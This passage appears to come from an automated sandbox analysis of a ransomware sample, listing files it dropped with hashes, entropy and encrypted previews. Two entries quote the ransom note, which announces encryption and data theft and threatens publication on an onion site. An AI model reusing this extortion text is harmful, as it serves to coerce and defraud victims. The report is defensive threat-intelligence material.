SSDEEP:	192:MAnhbq10pPlCWsjMTuvm4nqEcdZETDJi+wYjQYy8uKO53uUXEORV+n:M2hbqSpNHPTuZqNdZETDhyok3xW
MD5:	6A61C54C3E0F4E8640132FD9D3A09A96
SHA1:	2137D59558C0F728705CFCF38EEB2F85639AF046
SHA-256:	86BE7102BC664185C0C4467443BF41731F9F58AF8BDA2DD4F35E1AB8658530E3
SHA-512:	B96829B08114408DD4EEBE092EAE88DD386E8CD32F3D100F8678EBC0F8A244018ADA0056334A95BA8E49ADA701A8955CAD4E52C7B3F174BB5E00D99E11B2793E
Malicious:	false
Preview:	S.^.h...o...(..sK.ux...;:.].&}.Iw(...c{^.D..S...TF.:..........+.G.\4Un...d.....b.j...k...Zt....D.....h..v.T.P)S..V........Z6...P._ ..Ae}.2V...h.A.I.j....."Q.....>hx......-H..$... ..X...+..sim..T.m?....m<.....J.w.]......t\.....~-.xX.O;..}.6....;R.qr.....=........M....r^......Q..)...w].w..........1../{.y...C........6..[ .gy..s;.z...`...y}[.!..\..3$..S..p.......2.R..FK...;... ...3..O./#...:q...0..%.Z.d....F.DVO.h2r.....'[...QP.j...0 K..[u.4...s.d}.....")Z..h....F....RlFI.........*z.e...T..!.....4.7N...`V..C..._OM@.e....[...].R.......o.gKM.N.b...............e..:A..G.o...3....v..?.`...M..S..".Z.Y.w.......:.C.o.w$........G....8....y...-.5.T5k.UWt..N.i(...a......T..V..;.hW!?.........ao#;}..U..p[@V\tF-.......T=..Re~?....JC.%\|...NG..rS...B.B.~...q...~Hzc..j.......`D.......d..C......>....,X..A......`..K...Y.Z9....(..v?..~I\/l....8.....o.?."/....3..9..P.5.....@...e..K.7.._k6..H.Us.v....AU......{.....#K....\|....R.w.......,..'.....m..c..

C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97988361903147
Encrypted:	false
SSDEEP:	192:ZAOCxlGWaQdXjlSPfkOYOY6TRdlvrcuAaNqBMMVhGbOVV+n:ZAOCxwW5dzkE/OYMGxBGbOq
MD5:	FE81CBE988054614769F9A0DCBB60BC5
SHA1:	55AE2908B12975EC220B27B61B18C2FAD1193AB2
SHA-256:	2E419BBE6E1F32FB20DC27B3381AB2C87CB3B24CC4A2CFA949EDE55F6C18B194
SHA-512:	57729BCB5DF1670A6F8FE7F127B9D8CE8A0B41539C4F0209D24A93E39BC387C7C430F03551727C674BA4A942BCEF1621566AD3403AD31059C77E1E842E208B84
Malicious:	false
Preview:	.i...}.[xF.....t.k....r.^....8rX.N+.\|a ...>.....zvsV..^....P..{..{.R.}..<.....l..G.6....:f.5s..#..D.....r(D..k..[..e.98....T....{.+}....-3.0N}&..~..Q!...:.\......]B.l.A.C=./..j..B.G....(. .\....2rU&.c.....;:./..........{.t..h...k.M.$B>D.q....S\|.&..2.6H.A._,Y.vr...isk.^.......g.V........ ...I.n....Q.m.."N..^B].....k$v.,C.8x.#.X.1.62...P....s......HsX.......@JEG..R<.k./.iT..3.}..<.,e...K....U.7.W.f....O.9.Y....TD...Rh.."f.9.?......c..d.(..(.@~......&..g...3@.e....h..........J.9..5_.<r...:....'..X.[.......Y.J..KD?W....._@x._.a>l.3i......Q./.{]....~....l...K..,.k......v...4.D...s.k.....)....7.QCx.2..S.z..7......'.....iU..\|.e3...E,z.K...Q..8..(.0)g.j.-.Yh/......._.2...-&r.. ..M#hO....W$..&...7[...)>.qH.P.1.}.j.pm..c.t.....u...i.7v..in^X.f..y..y..R.qLo.N......V..>..,.H...7...k....._3p,.{...pl....(5Fe.A;9.....~f .<......>C.2.\.m!.2......0@..e..}.Jg....6'...q....X..%..b.\|.d....'..=sxx7Uz.. M...q>.v.UZX....a....M.K....d

C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97988361903147
Encrypted:	false
SSDEEP:	192:ZAOCxlGWaQdXjlSPfkOYOY6TRdlvrcuAaNqBMMVhGbOVV+n:ZAOCxwW5dzkE/OYMGxBGbOq
MD5:	FE81CBE988054614769F9A0DCBB60BC5
SHA1:	55AE2908B12975EC220B27B61B18C2FAD1193AB2
SHA-256:	2E419BBE6E1F32FB20DC27B3381AB2C87CB3B24CC4A2CFA949EDE55F6C18B194
SHA-512:	57729BCB5DF1670A6F8FE7F127B9D8CE8A0B41539C4F0209D24A93E39BC387C7C430F03551727C674BA4A942BCEF1621566AD3403AD31059C77E1E842E208B84
Malicious:	false
Preview:	.i...}.[xF.....t.k....r.^....8rX.N+.\|a ...>.....zvsV..^....P..{..{.R.}..<.....l..G.6....:f.5s..#..D.....r(D..k..[..e.98....T....{.+}....-3.0N}&..~..Q!...:.\......]B.l.A.C=./..j..B.G....(. .\....2rU&.c.....;:./..........{.t..h...k.M.$B>D.q....S\|.&..2.6H.A._,Y.vr...isk.^.......g.V........ ...I.n....Q.m.."N..^B].....k$v.,C.8x.#.X.1.62...P....s......HsX.......@JEG..R<.k./.iT..3.}..<.,e...K....U.7.W.f....O.9.Y....TD...Rh.."f.9.?......c..d.(..(.@~......&..g...3@.e....h..........J.9..5_.<r...:....'..X.[.......Y.J..KD?W....._@x._.a>l.3i......Q./.{]....~....l...K..,.k......v...4.D...s.k.....)....7.QCx.2..S.z..7......'.....iU..\|.e3...E,z.K...Q..8..(.0)g.j.-.Yh/......._.2...-&r.. ..M#hO....W$..&...7[...)>.qH.P.1.}.j.pm..c.t.....u...i.7v..in^X.f..y..y..R.qLo.N......V..>..,.H...7...k....._3p,.{...pl....(5Fe.A;9.....~f .<......>C.2.\.m!.2......0@..e..}.Jg....6'...q....X..%..b.\|.d....'..=sxx7Uz.. M...q>.v.UZX....a....M.K....d

C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3770
Entropy (8bit):	5.7317553348625525
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69G:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USi
MD5:	6D616A18BE7BFF4DDB438785DE3785A4
SHA1:	889F82D417D1C422CD952E12E1778B97A35CC75F
SHA-256:	EA4CE46289FB3149D92A3F9B63C2B47535FE4635F440063FD9706BCB1ABDCF4A
SHA-512:	0553ABBB233A30AC8C4940DDDAE51590541DD3744D14C65A27DD87729EE4E4E45DE86489565DCB05CE71F9D6D0136FB68426EFF190F83AB9FEC1EA43044E31F1
Malicious:	true
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Documents\SQSJKEBWDT.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9765370001668146
Encrypted:	false
SSDEEP:	192:R+fTV53ICiwpgJzbwl8K/59xb9FxQu/sUTSXaV+n:CVtIrwpgJzkllLxZFxQu/v+
MD5:	C0B72A33FA9063A713EDCE9571C33CA9
SHA1:	18C03822990B550B20A88783C73B4FA30069B48C
SHA-256:	467FDF3BBFACA1C6DB4CFD374F16DFF33CF043778EFFE2C8B67D49A53C949F43
SHA-512:	9A4CEDA1508F62239B559F4D010AC0DB6ECACC0E50CC0DA09BA8E91A44B6E021905179A1CB580F92345DFF4BE3527C269F3F01C532275C80BBEAC3176299CE0B
Malicious:	false
Preview:	...'.t...Ao.g^&-...?.Z.g.4.\|.}..,Q...M7.F..Q\....>...n....e..UHc...hk/..$...[ri/w.L...5d.I.......<....->..%...<..Q...!`...h(7.U....H.F/..1.Wb...mCU..0C..6.X...0...27c...kZ.....^.v.))j.Bdp..;....8.'.^..6..L...r....rJ.S......NL.s1.... .V/.._...P...;7...W&[:=...l..O..M...Q]#f.....i..@...\|,uD..Kf3.e..(S...MT.....4.d.vqg..j.a.t...W.U._...]n...=.OFk...c3a.Agk......~.@_..~.T...i.3].22k=(^J.>..&...D.!T.Z..`.&..Ms.U.^..U.;........@?...%..D..O7.m.)x.....#.".W.....I...p4.@S:=.C.'..].i.!..Q.2.K 0..8C...@#...n.w..Qx.... C.U....F.........u.}..1.2...@....W.[.rT.x......U..0.....X...gZ.& .....{..q.,'..,....w.......3..d...=.pU>G(. ..o.J@.P.$.I..1\8.R..2.As78..ldL.=..xA.)%.ou.E^.Qf.(..@.(.r....M3.8.w..M.Xe.........E.'....y?R....g....Z....^h.D\..H.B..NOYk...W=1$...1....9.!..&.g......xJ1.-.A...12uyz\]..)..lM../....I.e........i....oOR...I...w....4...hY...9\|.r]....>g.}.$......].c..(H..6j'>i_.z-...G`*..:..41..Z.P.jp....[...=."P.L......i\|L......+.<..4

C:\Users\user\Documents\SQSJKEBWDT.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9765370001668146
Encrypted:	false
SSDEEP:	192:R+fTV53ICiwpgJzbwl8K/59xb9FxQu/sUTSXaV+n:CVtIrwpgJzkllLxZFxQu/v+
MD5:	C0B72A33FA9063A713EDCE9571C33CA9
SHA1:	18C03822990B550B20A88783C73B4FA30069B48C
SHA-256:	467FDF3BBFACA1C6DB4CFD374F16DFF33CF043778EFFE2C8B67D49A53C949F43
SHA-512:	9A4CEDA1508F62239B559F4D010AC0DB6ECACC0E50CC0DA09BA8E91A44B6E021905179A1CB580F92345DFF4BE3527C269F3F01C532275C80BBEAC3176299CE0B
Malicious:	false
Preview:	...'.t...Ao.g^&-...?.Z.g.4.\|.}..,Q...M7.F..Q\....>...n....e..UHc...hk/..$...[ri/w.L...5d.I.......<....->..%...<..Q...!`...h(7.U....H.F/..1.Wb...mCU..0C..6.X...0...27c...kZ.....^.v.))j.Bdp..;....8.'.^..6..L...r....rJ.S......NL.s1.... .V/.._...P...;7...W&[:=...l..O..M...Q]#f.....i..@...\|,uD..Kf3.e..(S...MT.....4.d.vqg..j.a.t...W.U._...]n...=.OFk...c3a.Agk......~.@_..~.T...i.3].22k=(^J.>..&...D.!T.Z..`.&..Ms.U.^..U.;........@?...%..D..O7.m.)x.....#.".W.....I...p4.@S:=.C.'..].i.!..Q.2.K 0..8C...@#...n.w..Qx.... C.U....F.........u.}..1.2...@....W.[.rT.x......U..0.....X...gZ.& .....{..q.,'..,....w.......3..d...=.pU>G(. ..o.J@.P.$.I..1\8.R..2.As78..ldL.=..xA.)%.ou.E^.Qf.(..@.(.r....M3.8.w..M.Xe.........E.'....y?R....g....Z....^h.D\..H.B..NOYk...W=1$...1....9.!..&.g......xJ1.-.A...12uyz\]..)..lM../....I.e........i....oOR...I...w....4...hY...9\|.r]....>g.}.$......].c..(H..6j'>i_.z-...G`*..:..41..Z.P.jp....[...=."P.L......i\|L......+.<..4

C:\Users\user\Documents\SUAVTZKNFL.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978184048743922
Encrypted:	false
SSDEEP:	192:/fXEqrBAZysA0yU+xMFxG8I3C26olxd7Imm+dNpI4nRB++YPpikV+n:/PEqmZysWyFxZp27VR1nRB+jPe
MD5:	00492C52D1E10DDF101792F28F99C974
SHA1:	313B5B8BDF3751328AE8B7DA10FF53C9FBF71EFC
SHA-256:	536CBBC23CA7EAD86271CC75309842142D3901A5E70FDCA454BE2916EB1D0975
SHA-512:	86C5012E6CD02AE81BC58EE9408769DCEF4CB9FF9299DEA3B78FB4827B8B0AD30160BE2833FAB34B552B146D35324C3E68808620D9A5A4BD064DB8AA8F093BC1
Malicious:	false
Preview:	....'.I...q.7..lS.?......!.j.pk."$.&........}6...[....~..B.F......2F.....:...[...K.5.n$.....#$~..{...c.}bV....O\.cy..u..kK.~w....h.{rM1..".d>.......2..c.y..T.2..[...J`!....!../...Dh...<.z.Q~....g5...x./.....]...M.O.2.l:....C.D.lsjJa.V....d..}...-]q.....M\.4.....).+..@6.C...`S?..C.8&."}.....+.'.X.2.."..s../.[.f.R...A.>..c....375....Me...D...u..J..7k...3k...}}_&.....`>%..8.#.>r...\|C.M1.{.L.1S.W.>.C...Ro....2.&........l!..5!........._^c.sP"...c+./gS..E;..+.h..j...8.7...s.Q0(#..Zu.:R...'..3.....mS\H.Y.qL.~Hr.!.v..f.!.r.1J..b.].zj...~~<.q...0:....F...)....r......l.5O!M=......1.X....H..}Fe7:{..Z...]...HYQ.s)...d..Dp.)....%A....h..a....I8..fY..a..'.~.A...C.....UY c..M...-i..V.vH.y......_...ysb...8..A.o.e.E`[....4Z.7A..Io.D/.]ccrK"a......0...1..L"{\|...vx.W...w.....J...Lb....4.7.qi.....vPO......+..vX.Z.3c...a.\|.K...fx.VD.W..b..........(....Yv.........u...?..Q..,N..wKy.]..../....PM.o.K...o..<,. ...@.&.3..!..5.q..1Y....>..../r^'.E4

C:\Users\user\Documents\SUAVTZKNFL.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978184048743922
Encrypted:	false
SSDEEP:	192:/fXEqrBAZysA0yU+xMFxG8I3C26olxd7Imm+dNpI4nRB++YPpikV+n:/PEqmZysWyFxZp27VR1nRB+jPe
MD5:	00492C52D1E10DDF101792F28F99C974
SHA1:	313B5B8BDF3751328AE8B7DA10FF53C9FBF71EFC
SHA-256:	536CBBC23CA7EAD86271CC75309842142D3901A5E70FDCA454BE2916EB1D0975
SHA-512:	86C5012E6CD02AE81BC58EE9408769DCEF4CB9FF9299DEA3B78FB4827B8B0AD30160BE2833FAB34B552B146D35324C3E68808620D9A5A4BD064DB8AA8F093BC1
Malicious:	false
Preview:	....'.I...q.7..lS.?......!.j.pk."$.&........}6...[....~..B.F......2F.....:...[...K.5.n$.....#$~..{...c.}bV....O\.cy..u..kK.~w....h.{rM1..".d>.......2..c.y..T.2..[...J`!....!../...Dh...<.z.Q~....g5...x./.....]...M.O.2.l:....C.D.lsjJa.V....d..}...-]q.....M\.4.....).+..@6.C...`S?..C.8&."}.....+.'.X.2.."..s../.[.f.R...A.>..c....375....Me...D...u..J..7k...3k...}}_&.....`>%..8.#.>r...\|C.M1.{.L.1S.W.>.C...Ro....2.&........l!..5!........._^c.sP"...c+./gS..E;..+.h..j...8.7...s.Q0(#..Zu.:R...'..3.....mS\H.Y.qL.~Hr.!.v..f.!.r.1J..b.].zj...~~<.q...0:....F...)....r......l.5O!M=......1.X....H..}Fe7:{..Z...]...HYQ.s)...d..Dp.)....%A....h..a....I8..fY..a..'.~.A...C.....UY c..M...-i..V.vH.y......_...ysb...8..A.o.e.E`[....4Z.7A..Io.D/.]ccrK"a......0...1..L"{\|...vx.W...w.....J...Lb....4.7.qi.....vPO......+..vX.Z.3c...a.\|.K...fx.VD.W..b..........(....Yv.........u...?..Q..,N..wKy.]..../....PM.o.K...o..<,. ...@.&.3..!..5.q..1Y....>..../r^'.E4

C:\Users\user\Documents\SUAVTZKNFL.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979000801964847
Encrypted:	false
SSDEEP:	192:Hx8H4WGO5r7TW1m6fkJYGPzlnDC3tLGo2V+n:cN5r7TW1tf1G7lnD9oz
MD5:	CA237FC6EF8D39A4EA46A90E1DC17D92
SHA1:	28F416365817A282F7D2E09A28EFDD525A616A3E
SHA-256:	ACB4F2A8DB37F89470D8501C1CF60B46D9BF8A1916221F20FAE86D78274C5DA3
SHA-512:	B3CDB49C6AAACB2723497BE8487EC381B4FC3232DBA2DDB346A90496016586716C8CECF9AB8D7F256B88A97EFC6B18FFB53FE545DCC5E7250A95EE4CD2C05555
Malicious:	false
Preview:	.7..O^.........._..... uJ....\|.nM.Rh7.[.N....}C.@j..{bJ.R.^#..........dA.\|.n.G......FO."g.[.O.j..E.=...8...o.M.5u...v8Q.B.i.....d)'....p....IO..D.U..d.M...3.b....ex ..@\|...P..4.x.9@.).N...\.z..t..#6I.[...k..@..{.G.e...;....S....E..3.j.j.]......L..R.'d..V..i....Y....+~....8o.h...$A..}.S...O......}...~.o.$..5.Hr...{6..t...m.E....R.m.+u'C/!.[B..b...R.~...GW9.....Q.....!...u...!.B.9...P......n....x.....d..$.Lis....._06..d..x.lxtM....]..$..S...o...5..\|.l..X....+.:Z..Q.`~.b..C.2+[.~..A..........FCn...Ow.r.^....!``t6Jv.8.U...V)...K..B.........t..pp........f..L.b.jB......yr.....5.M.C..._........-q:.[X...\..........sL.].....Z.P....'.9.+SB.>.P..`(-.\x.[..YM......l........'..@_.4_.....l.s...I.8.u..u.{...4..GJ../.V..l.y6....'..+.U,o..qb..J....Fj.F. .SJ....".U. .\|.$>...<.F!........'.S....>... ......<Q.....1..dv.Ix.>...3......%..B......5.P.P.w.............2.hv....u..!.##A..... z%...=.L.o..i.....T.&..nUl..!...5s.\P....4\|ur..u..).y)H..._..@>..Z+...S.

C:\Users\user\Documents\SUAVTZKNFL.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979000801964847
Encrypted:	false
SSDEEP:	192:Hx8H4WGO5r7TW1m6fkJYGPzlnDC3tLGo2V+n:cN5r7TW1tf1G7lnD9oz
MD5:	CA237FC6EF8D39A4EA46A90E1DC17D92
SHA1:	28F416365817A282F7D2E09A28EFDD525A616A3E
SHA-256:	ACB4F2A8DB37F89470D8501C1CF60B46D9BF8A1916221F20FAE86D78274C5DA3
SHA-512:	B3CDB49C6AAACB2723497BE8487EC381B4FC3232DBA2DDB346A90496016586716C8CECF9AB8D7F256B88A97EFC6B18FFB53FE545DCC5E7250A95EE4CD2C05555
Malicious:	false
Preview:	.7..O^.........._..... uJ....\|.nM.Rh7.[.N....}C.@j..{bJ.R.^#..........dA.\|.n.G......FO."g.[.O.j..E.=...8...o.M.5u...v8Q.B.i.....d)'....p....IO..D.U..d.M...3.b....ex ..@\|...P..4.x.9@.).N...\.z..t..#6I.[...k..@..{.G.e...;....S....E..3.j.j.]......L..R.'d..V..i....Y....+~....8o.h...$A..}.S...O......}...~.o.$..5.Hr...{6..t...m.E....R.m.+u'C/!.[B..b...R.~...GW9.....Q.....!...u...!.B.9...P......n....x.....d..$.Lis....._06..d..x.lxtM....]..$..S...o...5..\|.l..X....+.:Z..Q.`~.b..C.2+[.~..A..........FCn...Ow.r.^....!``t6Jv.8.U...V)...K..B.........t..pp........f..L.b.jB......yr.....5.M.C..._........-q:.[X...\..........sL.].....Z.P....'.9.+SB.>.P..`(-.\x.[..YM......l........'..@_.4_.....l.s...I.8.u..u.{...4..GJ../.V..l.y6....'..+.U,o..qb..J....Fj.F. .SJ....".U. .\|.$>...<.F!........'.S....>... ......<Q.....1..dv.Ix.>...3......%..B......5.P.P.w.............2.hv....u..!.##A..... z%...=.L.o..i.....T.&..nUl..!...5s.\P....4\|ur..u..).y)H..._..@>..Z+...S.

C:\Users\user\Documents\ZGGKNSUKOP.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977493913946599
Encrypted:	false
SSDEEP:	192:07GJU9C2q7YuyAmY97cYvrypWF/0kSXeZCce+usiAYAFV+n:07kUm7fyAv97cYvH/hSOW+uPr
MD5:	D146139DDD813BD06D446D5B7C8F1953
SHA1:	54082619019365C70512D9E78CEF824A2C39FF93
SHA-256:	9B0EB407DEE2FC709298CD318CD3012B68EB488AC1F0DA12935E55546CA51F21
SHA-512:	ECFAE7E9D138C5EF01C9201F37F4D4B3F9273D4B9B4559D311A8AD9EA596E18AFE8EF78F38FC822061D31AF9688B238947132A67E9258C0BA4598A07FE66038A
Malicious:	false
Preview:	L.(..5.)....6...:)~?..).3.kX..2\|T..:Ux"e.w..m;.....f..r...%..0..<.RZD..$..YQ(.._.l..#m.......sF.v.^.]..".....Dj#q}..J.j."".{.{U.!......Lp}.Xq....(c...R.B...^.OF..}.=.=R3c{...g....Y.....G.Fd&U.c........_.3sFk.h#......&.....hI...G...~...5.^..`........K..Q.........Yp...p8c..E_V4T...h...2al...t..ZR...W..........m.\ 8.r.G.~..IH:...@..5..zaeQ.q>?7.q(....a.i.D.c.`.....-.?...Ny~./.F..z7..E.]D...$..n.......<t.....sv....M....`q....(i..T..c.l.p7..4!...2.6).%v...#}..."(.Q.....x.....-z.?.Z......"$........:....nMz..&]N.@+F.'8.A.[.).G....c..UTh.P.x.L?..~.4.z.o.K.Ya...0...NqY...y.6R..c.M...Y.-..jj........F....e.Ur[q'{...]..E!...z...h.)i........Ml.Q.....N..[...w.....v..:qrG..N..#...]..BY"we.A(..s!..O....yM].v.......t..:...<c....U)u.V.g....q..]\.k....U........m.gi,....eK....A.}..MuJq-.\|......[...Q.Bic1.....d,K..s ).5v.;f!7#.M.1C.I.....i.8c\|2..lb....M...,.7.....}...!....../o?..j.p.~@......YM.......KF..r...1~m.......qh.8q....B.....(..H}?q.Bp.8...#...`1H."A...m.7

C:\Users\user\Documents\ZGGKNSUKOP.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977493913946599
Encrypted:	false
SSDEEP:	192:07GJU9C2q7YuyAmY97cYvrypWF/0kSXeZCce+usiAYAFV+n:07kUm7fyAv97cYvH/hSOW+uPr
MD5:	D146139DDD813BD06D446D5B7C8F1953
SHA1:	54082619019365C70512D9E78CEF824A2C39FF93
SHA-256:	9B0EB407DEE2FC709298CD318CD3012B68EB488AC1F0DA12935E55546CA51F21
SHA-512:	ECFAE7E9D138C5EF01C9201F37F4D4B3F9273D4B9B4559D311A8AD9EA596E18AFE8EF78F38FC822061D31AF9688B238947132A67E9258C0BA4598A07FE66038A
Malicious:	false
Preview:	L.(..5.)....6...:)~?..).3.kX..2\|T..:Ux"e.w..m;.....f..r...%..0..<.RZD..$..YQ(.._.l..#m.......sF.v.^.]..".....Dj#q}..J.j."".{.{U.!......Lp}.Xq....(c...R.B...^.OF..}.=.=R3c{...g....Y.....G.Fd&U.c........_.3sFk.h#......&.....hI...G...~...5.^..`........K..Q.........Yp...p8c..E_V4T...h...2al...t..ZR...W..........m.\ 8.r.G.~..IH:...@..5..zaeQ.q>?7.q(....a.i.D.c.`.....-.?...Ny~./.F..z7..E.]D...$..n.......<t.....sv....M....`q....(i..T..c.l.p7..4!...2.6).%v...#}..."(.Q.....x.....-z.?.Z......"$........:....nMz..&]N.@+F.'8.A.[.).G....c..UTh.P.x.L?..~.4.z.o.K.Ya...0...NqY...y.6R..c.M...Y.-..jj........F....e.Ur[q'{...]..E!...z...h.)i........Ml.Q.....N..[...w.....v..:qrG..N..#...]..BY"we.A(..s!..O....yM].v.......t..:...<c....U)u.V.g....q..]\.k....U........m.gi,....eK....A.}..MuJq-.\|......[...Q.Bic1.....d,K..s ).5v.;f!7#.M.1C.I.....i.8c\|2..lb....M...,.7.....}...!....../o?..j.p.~@......YM.......KF..r...1~m.......qh.8q....B.....(..H}?q.Bp.8...#...`1H."A...m.7

C:\Users\user\Documents\ZQIXMVQGAH.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980183607368493
Encrypted:	false
SSDEEP:	192:7UVLjwJTfPXdOsfmMhA/D1qpxGJXfSMZ7FNV+n:4VLjADdOsrhArRPS27I
MD5:	2976AE72DE2B52A350BE00209B1B49B8
SHA1:	3D1C06BF0BEB15F0D8A3A17661288034A67A125F
SHA-256:	DBC465770CD3D75BD439F11C4EF9006275D1424076DDFF9BEF9410C7C7572064
SHA-512:	FD324C75D17696CD7959A83D8EB51F50F8B683EFCBFF6DCEE7D9F3C2C896C433D47EEB54ED86E91FF08CC145511D2B76673FE52CDC22EFC8B6D8E51217214B52
Malicious:	false
Preview:	.?N.....!.......>K..x...........f..#./..R......:,....>....7_#aJ....G.......V.~q.Ok.!..Z..sP..n....RG.{.....S.bk&........m.=t..q\|.....wMl..~.X....kJ;.d.........@..{.,.T7.~.rh..lS.Mj.g..T.%.\5.....".s........d9p.m.._..Hm........8.H....F.MK.s..`.....;.?.....h....1...zY....>D5.N../.f..V.VkK'.3o....0-..D.S..o.2[..l............\|P.B.7.;:.>.....).j....jD3..g....xZ%.)?Y.'9...L..HH.`...d]..Z.>. 1...;.E...<...I4..5.7.\....+q'..Y?....s......{_.D.Y.....:={.A...h...So'.aU.I.}.[0..g...:.S....[..d..J.?...`.. ..F..'...........M.s...C..:.VC..). Xm...J%.G..A.....O.........].......w.U7}..D.%M.E...-.._=c........&..\.>...W......}.t......y...p..cC....iQ\.&^.....XD....f....Km...A..T.>j...z.r.y..{.......t5....f..../..!y..@`.y....R....a.L...d..'......(.z.u.....i.k.,]n..)....-.Lg...N...#..'......a'O..6Z..............2........j.qJ.D..:.Y`..0U.>i.<b...d$......&.......&.Q.h....$k.I.=.&+....5:+....:..N*.Z......~6..1`Mx.i..d.Fu..e.GB\|......7.......5b...g.s

C:\Users\user\Documents\ZQIXMVQGAH.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980183607368493
Encrypted:	false
SSDEEP:	192:7UVLjwJTfPXdOsfmMhA/D1qpxGJXfSMZ7FNV+n:4VLjADdOsrhArRPS27I
MD5:	2976AE72DE2B52A350BE00209B1B49B8
SHA1:	3D1C06BF0BEB15F0D8A3A17661288034A67A125F
SHA-256:	DBC465770CD3D75BD439F11C4EF9006275D1424076DDFF9BEF9410C7C7572064
SHA-512:	FD324C75D17696CD7959A83D8EB51F50F8B683EFCBFF6DCEE7D9F3C2C896C433D47EEB54ED86E91FF08CC145511D2B76673FE52CDC22EFC8B6D8E51217214B52
Malicious:	false
Preview:	.?N.....!.......>K..x...........f..#./..R......:,....>....7_#aJ....G.......V.~q.Ok.!..Z..sP..n....RG.{.....S.bk&........m.=t..q\|.....wMl..~.X....kJ;.d.........@..{.,.T7.~.rh..lS.Mj.g..T.%.\5.....".s........d9p.m.._..Hm........8.H....F.MK.s..`.....;.?.....h....1...zY....>D5.N../.f..V.VkK'.3o....0-..D.S..o.2[..l............\|P.B.7.;:.>.....).j....jD3..g....xZ%.)?Y.'9...L..HH.`...d]..Z.>. 1...;.E...<...I4..5.7.\....+q'..Y?....s......{_.D.Y.....:={.A...h...So'.aU.I.}.[0..g...:.S....[..d..J.?...`.. ..F..'...........M.s...C..:.VC..). Xm...J%.G..A.....O.........].......w.U7}..D.%M.E...-.._=c........&..\.>...W......}.t......y...p..cC....iQ\.&^.....XD....f....Km...A..T.>j...z.r.y..{.......t5....f..../..!y..@`.y....R....a.L...d..'......(.z.u.....i.k.,]n..)....-.Lg...N...#..'......a'O..6Z..............2........j.qJ.D..:.Y`..0U.>i.<b...d$......&.......&.Q.h....$k.I.=.&+....5:+....:..N*.Z......~6..1`Mx.i..d.Fu..e.GB\|......7.......5b...g.s

C:\Users\user\Documents\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3754
Entropy (8bit):	5.729372205750946
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69r:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USv
MD5:	26463C61BD7F65CE46E055952FB0D7C3
SHA1:	D04DB848869349999B519DEEF89C66F7B2E04B7A
SHA-256:	0EE2A404255C15C3F703EEC480EAF9E117505E34B11C7D69CCC2139CB6733DD4
SHA-512:	AD3E185D9CB34394577C00B1DFCEC9EFC4D2782661CBB67BE183D62D6078FB71B8F3551FC150A84DC5797B81E9E7A592C2B26E13B22F342499DCB21640F86527
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Downloads\BNAGMGSPLO.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9768802738462155
Encrypted:	false
